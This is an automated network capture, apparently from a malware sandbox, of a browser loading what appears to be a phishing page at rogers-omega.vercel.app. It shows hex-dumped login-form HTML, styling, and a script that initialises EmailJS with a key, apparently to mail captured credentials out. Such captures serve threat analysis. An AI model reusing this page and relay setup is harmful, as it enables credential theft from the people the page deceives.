                                                      Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: 6WdWq63NWEG4/2Qd.2Context: 4f7789582bd86e65<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAfCz/BjC2hZA7ltNan4YSgc9pV6QkvWY3cRkZX7jLKiSuAq3/i++EGXz8Eydus61xrPgk8kV5ZgR1TTfLffqybrZ4daj9Ikk8YPGqQ9Nfm9oAi
                                                      2024-09-29 05:50:30 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 36 57 64 57 71 36 33 4e 57 45 47 34 2f 32 51 64 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 34 66 37 37 38 39 35 38 32 62 64 38 36 65 36 35 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                      Data Ascii: BND 3 CON\WNS 0 197MS-CV: 6WdWq63NWEG4/2Qd.3Context: 4f7789582bd86e65<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                      2024-09-29 05:50:30 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                      Data Ascii: 202 1 CON 58
                                                      2024-09-29 05:50:30 UTC58INData Raw: 4d 53 2d 43 56 3a 20 6b 41 38 64 54 54 70 59 4e 45 6d 50 4b 57 61 45 2b 78 43 31 45 51 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                      Data Ascii: MS-CV: kA8dTTpYNEmPKWaE+xC1EQ.0Payload parsing failed.


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      2192.168.2.64971876.76.21.1644434420C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-09-29 05:50:31 UTC666OUTGET / HTTP/1.1
                                                      Host: rogers-omega.vercel.app
                                                      Connection: keep-alive
                                                      Upgrade-Insecure-Requests: 1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: navigate
                                                      Sec-Fetch-User: ?1
                                                      Sec-Fetch-Dest: document
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2024-09-29 05:50:31 UTC489INHTTP/1.1 200 OK
                                                      Accept-Ranges: bytes
                                                      Access-Control-Allow-Origin: *
                                                      Age: 152749
                                                      Cache-Control: public, max-age=0, must-revalidate
                                                      Content-Disposition: inline
                                                      Content-Length: 5265
                                                      Content-Type: text/html; charset=utf-8
                                                      Date: Sun, 29 Sep 2024 05:50:31 GMT
                                                      Etag: "e3fe736979b22a96c43be6ab7827a23a"
                                                      Server: Vercel
                                                      Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                      X-Vercel-Cache: HIT
                                                      X-Vercel-Id: iad1::hdkhb-1727589031810-05e34dcebe0f
                                                      Connection: close
                                                      2024-09-29 05:50:31 UTC2372INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 73 74 79 6c 65 2e 63 73 73 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 0a 20 20 20 20 20 20 20 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63
                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <link rel="stylesheet" href="style.css"> <link rel="stylesheet" href="https://fonts.googleapis.c
                                                      2024-09-29 05:50:31 UTC1064INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 61 62 65 6c 20 66 6f 72 3d 22 72 65 6d 65 6d 62 65 72 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 72 65 6d 65 6d 62 65 72 5f 75 73 65 72 6e 61 6d 65 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 52 65 6d 65 6d 62 65 72 20 75 73 65 72 6e 61 6d 65 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 61 62 65 6c 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 72 3e 0a 20 20 20
                                                      Data Ascii: <label for="remember" data-translate="remember_username"> Remember username </label> </div> <br>
                                                      2024-09-29 05:50:31 UTC1829INData Raw: 22 20 6f 6e 63 6c 69 63 6b 3d 22 67 6f 54 6f 53 74 65 70 31 28 29 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 63 68 61 6e 67 65 5f 75 73 65 72 6e 61 6d 65 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 43 68 61 6e 67 65 20 75 73 65 72 6e 61 6d 65 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 72 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                      Data Ascii: " onclick="goToStep1()" data-translate="change_username"> Change username </a> </div> <br>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      3192.168.2.64971976.76.21.1644434420C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-09-29 05:50:32 UTC554OUTGET /style.css HTTP/1.1
                                                      Host: rogers-omega.vercel.app
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: text/css,*/*;q=0.1
                                                      Sec-Fetch-Site: same-origin
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: style
                                                      Referer: https://rogers-omega.vercel.app/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2024-09-29 05:50:32 UTC510INHTTP/1.1 200 OK
                                                      Accept-Ranges: bytes
                                                      Access-Control-Allow-Origin: *
                                                      Age: 152749
                                                      Cache-Control: public, max-age=0, must-revalidate
                                                      Content-Disposition: inline; filename="style.css"
                                                      Content-Length: 5812
                                                      Content-Type: text/css; charset=utf-8
                                                      Date: Sun, 29 Sep 2024 05:50:32 GMT
                                                      Etag: "45034a5d0c561a2ee640ea9ab4fb2c24"
                                                      Server: Vercel
                                                      Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                      X-Vercel-Cache: HIT
                                                      X-Vercel-Id: iad1::d56br-1727589032529-4ff7f7c47937
                                                      Connection: close
                                                      2024-09-29 05:50:32 UTC2372INData Raw: 40 69 6d 70 6f 72 74 20 75 72 6c 28 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 32 3f 66 61 6d 69 6c 79 3d 4d 6f 6e 74 73 65 72 72 61 74 3a 77 67 68 74 40 34 30 30 3b 35 30 30 3b 37 30 30 3b 38 30 30 26 66 61 6d 69 6c 79 3d 50 6f 70 70 69 6e 73 3a 77 67 68 74 40 34 30 30 3b 35 30 30 3b 37 30 30 26 64 69 73 70 6c 61 79 3d 73 77 61 70 27 29 3b 0a 0a 2a 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 20 20 20 20 6f 76 65 72 66 6c 6f 77 2d 78 3a 20 68 69 64 64 65 6e 3b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 4d 6f 6e 74 73 65 72 72 61 74 27 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 62 6f 64 79
                                                      Data Ascii: @import url('https://fonts.googleapis.com/css2?family=Montserrat:wght@400;500;700;800&family=Poppins:wght@400;500;700&display=swap');* { margin: 0; padding: 0 !important; overflow-x: hidden; font-family: 'Montserrat', sans-serif;}body
                                                      2024-09-29 05:50:32 UTC1043INData Raw: 3b 0a 7d 0a 0a 2e 69 6e 66 6f 2d 69 63 6f 6e 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 74 72 61 6e 73 69 74 69 6f 6e 3a 20 30 2e 33 73 20 65 61 73 65 3b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 46 36 46 41 37 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 59 28 2d 35 30 25 29 20 73 63 61 6c 65 28 31 2e 34 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 41 46 41 46 41 3b 0a 7d 0a 0a 2e 72 65 6d 65 6d 62 65 72 5f 70 77 64 5f 63 6f 6c 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 20 20 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 20 72 6f 77 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 20 20 20 20 67 61 70 3a 20 38 70 78 3b 0a 20 20 20 20 66 6f
                                                      Data Ascii: ;}.info-icon:hover { transition: 0.3s ease; background-color: #2F6FA7; transform: translateY(-50%) scale(1.4) !important; color: #FAFAFA;}.remember_pwd_col { display: flex; flex-direction: row !important; gap: 8px; fo
                                                      2024-09-29 05:50:32 UTC2397INData Raw: 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 44 41 32 39 31 43 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 36 30 30 3b 0a 20 20 20 20 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 0a 7d 0a 0a 2e 73 69 67 6e 5f 62 74 6e 2c 0a 2e 63 6f 6e 74 5f 62 74 6e 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 44 41 32 39 31 43 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 41 46 41 46 41 3b 0a 20 20 20 20 62 6f 72 64 65 72 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 38 72 65 6d 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64
                                                      Data Ascii: gn: center; color: #DA291C; font-size: 16px; font-weight: 600; overflow: hidden;}.sign_btn,.cont_btn { background-color: #DA291C; color: #FAFAFA; border: none; width: 100%; padding: 0.8rem !important; border-rad


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      4192.168.2.64972076.76.21.1644434420C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-09-29 05:50:32 UTC539OUTGET /email.js HTTP/1.1
                                                      Host: rogers-omega.vercel.app
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: */*
                                                      Sec-Fetch-Site: same-origin
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: script
                                                      Referer: https://rogers-omega.vercel.app/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2024-09-29 05:50:32 UTC521INHTTP/1.1 200 OK
                                                      Accept-Ranges: bytes
                                                      Access-Control-Allow-Origin: *
                                                      Age: 152749
                                                      Cache-Control: public, max-age=0, must-revalidate
                                                      Content-Disposition: inline; filename="email.js"
                                                      Content-Length: 60
                                                      Content-Type: application/javascript; charset=utf-8
                                                      Date: Sun, 29 Sep 2024 05:50:32 GMT
                                                      Etag: "a4b98151fc560b993f5a9569bf1cb2d7"
                                                      Server: Vercel
                                                      Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                      X-Vercel-Cache: HIT
                                                      X-Vercel-Id: iad1::75dkx-1727589032547-7768323d275d
                                                      Connection: close
                                                      2024-09-29 05:50:32 UTC60INData Raw: 28 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 65 6d 61 69 6c 6a 73 2e 69 6e 69 74 28 27 6f 44 4a 6e 49 5f 43 79 42 6c 4a 61 36 37 42 42 76 27 29 3b 0a 7d 29 28 29 3b 0a
                                                      Data Ascii: (function () { emailjs.init('oDJnI_CyBlJa67BBv');})();


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      5192.168.2.649724151.101.129.2294434420C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-09-29 05:50:32 UTC563OUTGET /npm/@emailjs/browser@3/dist/email.min.js HTTP/1.1
                                                      Host: cdn.jsdelivr.net
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: */*
                                                      Sec-Fetch-Site: cross-site
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: script
                                                      Referer: https://rogers-omega.vercel.app/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2024-09-29 05:50:32 UTC756INHTTP/1.1 200 OK
                                                      Connection: close
                                                      Content-Length: 2058
                                                      Access-Control-Allow-Origin: *
                                                      Access-Control-Expose-Headers: *
                                                      Timing-Allow-Origin: *
                                                      Cache-Control: public, max-age=604800, s-maxage=43200
                                                      Cross-Origin-Resource-Policy: cross-origin
                                                      X-Content-Type-Options: nosniff
                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                      Content-Type: application/javascript; charset=utf-8
                                                      X-JSD-Version: 3.12.1
                                                      X-JSD-Version-Type: version
                                                      ETag: W/"80a-PXSZ1xOJiieY9EnYs1KNQJRHUgg"
                                                      Accept-Ranges: bytes
                                                      Age: 12070
                                                      Date: Sun, 29 Sep 2024 05:50:32 GMT
                                                      X-Served-By: cache-fra-etou8220134-FRA, cache-nyc-kteb1890054-NYC
                                                      X-Cache: HIT, HIT
                                                      Vary: Accept-Encoding
                                                      alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                      2024-09-29 05:50:32 UTC1378INData Raw: 28 28 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 65 3d 7b 64 3a 28 74 2c 72 29 3d 3e 7b 66 6f 72 28 76 61 72 20 69 20 69 6e 20 72 29 65 2e 6f 28 72 2c 69 29 26 26 21 65 2e 6f 28 74 2c 69 29 26 26 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 69 2c 7b 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 67 65 74 3a 72 5b 69 5d 7d 29 7d 2c 6f 3a 28 65 2c 74 29 3d 3e 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 65 2c 74 29 2c 72 3a 65 3d 3e 7b 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 26 26 53 79 6d 62 6f 6c 2e 74 6f 53 74 72 69 6e 67 54 61 67 26 26 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 53
                                                      Data Ascii: (()=>{"use strict";var e={d:(t,r)=>{for(var i in r)e.o(r,i)&&!e.o(t,i)&&Object.defineProperty(t,i,{enumerable:!0,get:r[i]})},o:(e,t)=>Object.prototype.hasOwnProperty.call(e,t),r:e=>{"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,S
                                                      2024-09-29 05:50:32 UTC680INData Raw: 2c 61 3d 28 65 2c 74 2c 69 2c 6f 29 3d 3e 7b 63 6f 6e 73 74 20 61 3d 6f 7c 7c 72 2e 5f 75 73 65 72 49 44 3b 73 28 61 2c 65 2c 74 29 3b 63 6f 6e 73 74 20 64 3d 7b 6c 69 62 5f 76 65 72 73 69 6f 6e 3a 22 33 2e 31 32 2e 31 22 2c 75 73 65 72 5f 69 64 3a 61 2c 73 65 72 76 69 63 65 5f 69 64 3a 65 2c 74 65 6d 70 6c 61 74 65 5f 69 64 3a 74 2c 74 65 6d 70 6c 61 74 65 5f 70 61 72 61 6d 73 3a 69 7d 3b 72 65 74 75 72 6e 20 6e 28 22 2f 61 70 69 2f 76 31 2e 30 2f 65 6d 61 69 6c 2f 73 65 6e 64 22 2c 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 64 29 2c 7b 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 22 7d 29 7d 2c 64 3d 28 65 2c 74 2c 69 2c 6f 29 3d 3e 7b 63 6f 6e 73 74 20 61 3d 6f 7c 7c 72 2e 5f 75 73 65 72 49 44 2c 64
                                                      Data Ascii: ,a=(e,t,i,o)=>{const a=o||r._userID;s(a,e,t);const d={lib_version:"3.12.1",user_id:a,service_id:e,template_id:t,template_params:i};return n("/api/v1.0/email/send",JSON.stringify(d),{"Content-type":"application/json"})},d=(e,t,i,o)=>{const a=o||r._userID,d


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      6192.168.2.649723151.101.129.2294434420C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-09-29 05:50:32 UTC621OUTGET /npm/bootstrap@5.2.3/dist/css/bootstrap.min.css HTTP/1.1
                                                      Host: cdn.jsdelivr.net
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      Origin: https://rogers-omega.vercel.app
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: text/css,*/*;q=0.1
                                                      Sec-Fetch-Site: cross-site
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: style
                                                      Referer: https://rogers-omega.vercel.app/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2024-09-29 05:50:32 UTC763INHTTP/1.1 200 OK
                                                      Connection: close
                                                      Content-Length: 194901
                                                      Access-Control-Allow-Origin: *
                                                      Access-Control-Expose-Headers: *
                                                      Timing-Allow-Origin: *
                                                      Cache-Control: public, max-age=31536000, s-maxage=31536000, immutable
                                                      Cross-Origin-Resource-Policy: cross-origin
                                                      X-Content-Type-Options: nosniff
                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                      Content-Type: text/css; charset=utf-8
                                                      X-JSD-Version: 5.2.3
                                                      X-JSD-Version-Type: version
                                                      ETag: W/"2f955-d5HdHzFzoNYsw5wh0q1x/I2tDnI"
                                                      Accept-Ranges: bytes
                                                      Age: 1728374
                                                      Date: Sun, 29 Sep 2024 05:50:32 GMT
                                                      X-Served-By: cache-fra-eddf8230122-FRA, cache-ewr-kewr1740037-EWR
                                                      X-Cache: HIT, HIT
                                                      Vary: Accept-Encoding
                                                      alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                      2024-09-29 05:50:32 UTC1378INData Raw: 40 63 68 61 72 73 65 74 20 22 55 54 46 2d 38 22 3b 2f 2a 21 0a 20 2a 20 42 6f 6f 74 73 74 72 61 70 20 20 76 35 2e 32 2e 33 20 28 68 74 74 70 73 3a 2f 2f 67 65 74 62 6f 6f 74 73 74 72 61 70 2e 63 6f 6d 2f 29 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 32 32 20 54 68 65 20 42 6f 6f 74 73 74 72 61 70 20 41 75 74 68 6f 72 73 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 32 32 20 54 77 69 74 74 65 72 2c 20 49 6e 63 2e 0a 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 4d 49 54 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 62 6c 6f 62 2f 6d 61 69 6e 2f 4c 49 43 45 4e 53 45 29 0a 20 2a 2f 3a 72 6f 6f 74 7b 2d 2d 62 73 2d 62 6c 75 65 3a 23 30 64 36 65 66 64 3b
                                                      Data Ascii: @charset "UTF-8";/*! * Bootstrap v5.2.3 (https://getbootstrap.com/) * Copyright 2011-2022 The Bootstrap Authors * Copyright 2011-2022 Twitter, Inc. * Licensed under MIT (https://github.com/twbs/bootstrap/blob/main/LICENSE) */:root{--bs-blue:#0d6efd;
                                                      2024-09-29 05:50:32 UTC1378INData Raw: 2d 2d 62 73 2d 66 6f 6e 74 2d 6d 6f 6e 6f 73 70 61 63 65 3a 53 46 4d 6f 6e 6f 2d 52 65 67 75 6c 61 72 2c 4d 65 6e 6c 6f 2c 4d 6f 6e 61 63 6f 2c 43 6f 6e 73 6f 6c 61 73 2c 22 4c 69 62 65 72 61 74 69 6f 6e 20 4d 6f 6e 6f 22 2c 22 43 6f 75 72 69 65 72 20 4e 65 77 22 2c 6d 6f 6e 6f 73 70 61 63 65 3b 2d 2d 62 73 2d 67 72 61 64 69 65 6e 74 3a 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 38 30 64 65 67 2c 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 31 35 29 2c 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 29 29 3b 2d 2d 62 73 2d 62 6f 64 79 2d 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 76 61 72 28 2d 2d 62 73 2d 66 6f 6e 74 2d 73 61 6e 73 2d 73 65 72 69 66 29 3b 2d 2d 62 73 2d 62 6f 64 79 2d 66 6f 6e 74 2d 73 69 7a 65
                                                      Data Ascii: --bs-font-monospace:SFMono-Regular,Menlo,Monaco,Consolas,"Liberation Mono","Courier New",monospace;--bs-gradient:linear-gradient(180deg, rgba(255, 255, 255, 0.15), rgba(255, 255, 255, 0));--bs-body-font-family:var(--bs-font-sans-serif);--bs-body-font-size
                                                      2024-09-29 05:50:32 UTC1378INData Raw: 67 68 74 3a 31 2e 32 7d 2e 68 31 2c 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 63 61 6c 63 28 31 2e 33 37 35 72 65 6d 20 2b 20 31 2e 35 76 77 29 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 31 32 30 30 70 78 29 7b 2e 68 31 2c 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 35 72 65 6d 7d 7d 2e 68 32 2c 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 63 61 6c 63 28 31 2e 33 32 35 72 65 6d 20 2b 20 2e 39 76 77 29 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 31 32 30 30 70 78 29 7b 2e 68 32 2c 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 72 65 6d 7d 7d 2e 68 33 2c 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 63 61 6c 63 28 31 2e 33 72 65 6d 20 2b 20 2e 36 76 77 29 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 31 32 30 30 70 78 29 7b 2e 68 33 2c 68
                                                      Data Ascii: ght:1.2}.h1,h1{font-size:calc(1.375rem + 1.5vw)}@media (min-width:1200px){.h1,h1{font-size:2.5rem}}.h2,h2{font-size:calc(1.325rem + .9vw)}@media (min-width:1200px){.h2,h2{font-size:2rem}}.h3,h3{font-size:calc(1.3rem + .6vw)}@media (min-width:1200px){.h3,h
                                                      2024-09-29 05:50:32 UTC1378INData Raw: 63 6b 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 6f 76 65 72 66 6c 6f 77 3a 61 75 74 6f 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 37 35 65 6d 7d 70 72 65 20 63 6f 64 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 69 6e 68 65 72 69 74 3b 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 6e 6f 72 6d 61 6c 7d 63 6f 64 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 37 35 65 6d 3b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 62 73 2d 63 6f 64 65 2d 63 6f 6c 6f 72 29 3b 77 6f 72 64 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 7d 61 3e 63 6f 64 65 7b 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 7d 6b 62 64 7b 70 61 64 64 69 6e 67 3a 2e 31 38 37 35 72 65 6d 20 2e 33 37 35 72 65 6d 3b 66 6f 6e 74 2d 73 69 7a 65 3a
